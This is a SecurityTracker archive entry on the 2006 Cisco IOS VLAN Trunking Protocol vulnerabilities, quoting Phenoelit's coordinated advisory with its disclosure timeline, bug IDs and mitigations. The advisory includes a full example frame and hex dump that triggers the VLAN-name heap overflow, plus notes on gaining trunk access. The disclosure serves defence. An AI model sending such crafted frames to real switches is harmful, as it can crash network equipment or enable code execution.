SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Device (Router/Bridge/Hub)  >   Cisco IOS Vendors:   Cisco
Cisco IOS VLAN Trunking Protocol Bugs Let Remote Users Deny Service and Execute Arbitrary Code
SecurityTracker Alert ID:  1016843
SecurityTracker URL:  http://securitytracker.com/id/1016843
CVE Reference:   CVE-2006-4774, CVE-2006-4775, CVE-2006-4776   (Links to External Site)
Updated:  Jun 3 2008
Original Entry Date:  Sep 13 2006
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Vendor Confirmed:  Yes  

Description:   A vulnerability was reported in Cisco IOS in the processing of VLAN Trunking Protocol (VTP) packets. A remote user can cause denial of service conditions. A remote user may be able to execute arbitrary code on the target system.

A remote user on the local network segment can send a specially crafted VTP version 1 summary packet with the VTP version field set to "2" to a trunk enabled port to cause the switch to reset with a Software Forced Crash Exception.

A remote user can send a VTP summary advertisement with a Type-Length-Value containing a specially crafted VLAN name that is longer than 100 characters to a trunk enabled port to cause the switch to reset with an Unassigned Exception error.

A remote user can send specially crafted VTP udates to trigger a heap overflow and potentially execute arbitrary code.

Cisco has assigned Cisco Bug IDs CSCsd52629, CSCsd34759, CSCse40078, CSCse47765, CSCsd34855, and CSCei54611 to these vulnerabilities.

Cisco Catalyst switches running Cisco IOS with VTP Operating Mode set to "server" or "client" are affected.

Cisco Catalyst switches running Cisco CatOS with VTP Operating Mode set to either "server" or "client" are affected by the "Integer Wrap in VTP revision" vulnerability.

Switches with VTP Operating Mode set to "transparent" are not affected [this is the default setting].

The vendor was notified on July 6, 2005.

FX from Phenoelit Group reported these vulnerabilities.

The original advisory is available at:

http://www.phenoelit.de/stuff/CiscoVTP.txt

Impact:   A remote user can cause denial of service conditions.

A remote user can execute arbitrary code on the target system.

Solution:   No solution was available at the time of this entry.

The Cisco advisory is available at:

http://www.cisco.com/warp/public/707/cisco-sr-20060913-vtp.shtml

Vendor URL:  www.cisco.com/warp/public/707/cisco-sr-20060913-vtp.shtml (Links to External Site)
Cause:   Boundary error, Exception handling error
Underlying OS:  

Message History:   None.


 Source Message Contents

Date:  Wed, 13 Sep 2006 14:18:41 +0200
Subject:  Cisco IOS VTP issues

Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +---+>

[ Title ]
        Cisco Systems IOS VTP multiple vulnerabilities

[ Authors ]
        FX              <fx@phenoelit.de>

        Phenoelit Group (http://www.phenoelit.de)
        Advisory        http://www.phenoelit.de/stuff/CiscoVTP.txt

[ Affected Products ]
        Cisco IOS and CatOS

        Tested on:      C3550 IOS 12.1(19)

        Cisco Bug ID:   CSCei54611
        CERT Vu ID:     <not assinged>

[ Vendor communication ]
        06.07.05        Initial Notification, gaus@cisco.com
        12.07.05        PSIRT member Wendy Garvin <wgarvin@cisco.com>
                        took over
        14.07.05        Wendy states the there is a fix for one of the 
                        issues
        19.07.05        According to Wendy, Cisco has trouble reproducing
                        the issues and finding the affected code
        27.07.05        Wendy notifies FX about fixed code
        12.09.06        Phenoelit advisory goes to Cisco (FX just forgot 
                        about it, too much to hack, too little time, but the 
                        PSIRT party in Vegas was a good reminder)
        13.09.06        Final advisory going public as coordinated release

[ Overview ]
        Cisco Systems IOS contains bugs when handling the VLAN
        Trunking Protocol (VTP). Specially crafted packets may cause Denial of
        Service conditions, confusion of the network operator and a heap
        overflow with the possibility for arbitrary code execution.

[ Description ]
        Cisco IOS suffers from several bugs in the VTP handling code. All
        issues require VTP to be in server or client mode. Transparent mode
        (default) is not affected.

        Issue 1: Denial of Service
        When sending a VTP version 1 summary frame to a Cisco IOS device 
        and setting the VTP version field to value 2, the device stops
        working. Apparently, the VTP handling process will loop and is
        terminated by the systems watchdog process, reloading the device.

        Issue 2: Integer wrap in VTP revision
        If an attacker can send VTP updates (summary and sub) to a Cisco IOS
        or CatOS device, he can choose the revision of the VTP information. 
        A revision of 0x7FFFFFFF will be accepted by IOS. When the switchs 
        VLAN configuration is changed by an operator, IOS increases the 
        revision, which becomes 0x80000000 and seems to be internally 
        tracked by a signed integer variable. The revision is therefore 
        seen as large negative value. From this point in time on, the switch 
        will not be able to communicate changed VLAN configurations, since 
        the generated updates will be rejected by all other switches.

        Issue 3: VLAN name heap overflow
        If an attacker can send VTP updates to a Cisco IOS device, the 
        type 2 frames contain records for each individual VLAN in the update.
        One field of the VTP records contains the name of the VLAN, another
        field the length of this name. Sending an update with VLAN name 
        above 100 bytes and correctly reflecting the length in the VLAN
        name length field causes a heap overflow. The overflow can be 
        exploited to execute arbitrary code on the receiving switch. The 
        maximum length of a VLAN name in VTP is 255 bytes.

[ Example ]
        The following is an example frame for issue 3. The appropriate VTP
        summary advertisement (type 1) must be sent before this frame.

        IEEE 802.3 Ethernet 
            Destination: CDP/VTP (01:00:0c:cc:cc:cc)
            Source: <any>
            Length: 260
        Logical-Link Control
        Virtual Trunking Protocol
            Version: 0x01
            Code: Subset-Advert (0x02)
            Sequence Number: 1
            Management Domain Length: 5
            Management Domain: AAAAA
            Configuration Revision Number: 3
            VLAN Information
                VLAN Information Length: 212
                Status: 0x00
                VLAN Type: Ethernet (0x01)
                VLAN Name Length: 200
                ISL VLAN ID: 0x0001
                MTU Size: 1500
                802.10 Index: 0x000186a1
                VLAN Name: AAAAA[...]AAAAAA (200 in total)
        
        0000  01 00 0c cc cc cc 00 fe fe c0 01 00 01 04 aa aa   ...........^....
        0010  03 00 00 0c 20 03 01 02 01 05 41 41 41 41 41 00   .... .....AAAAA.
        0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
        0030  00 00 00 00 00 00 00 00 00 00 00 00 00 03 d4 00   ................
        0040  01 c8 00 01 05 dc 00 01 86 a1 41 41 41 41 41 41   ..........AAAAAA
        0050  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0060  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0070  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0080  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0090  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00a0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00b0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00c0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00d0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00e0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00f0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0100  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0110  41 41                                             AA

[ Notes ]
        The VTP management domain is needed for the summary advertisement
        to be correct. This information is distributed via CDP if enabled.

        The attacker has to be on a trunk port for VTP frames to be 
        accepted. The Dynamic Trunk Protocol (DTP) can be used to become 
        a trunking peer.

[ Solution ]
        Cisco Systems provides fixed software, which can be found based on
        the following bug IDs:
        CSCsd52629/CSCsd34759 -- VTP version field DoS
        CSCse40078/CSCse47765 -- Integer Wrap in VTP revision
        CSCsd34855/CSCei54611 -- Buffer Overflow in VTP VLAN name

        In general, it is recommended to configure a shared VTP password, 
        which will be used in an MD5 hash to protect the summary 
        advertisement.

[ end of file ($Revision: 1.1 $) ]

-- 
         FX           <fx@phenoelit.de>
      Phenoelit   (http://www.phenoelit.de)
672D 64B2 DE42 FCF7 8A5E E43B C0C1 A242 6D63 B564

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC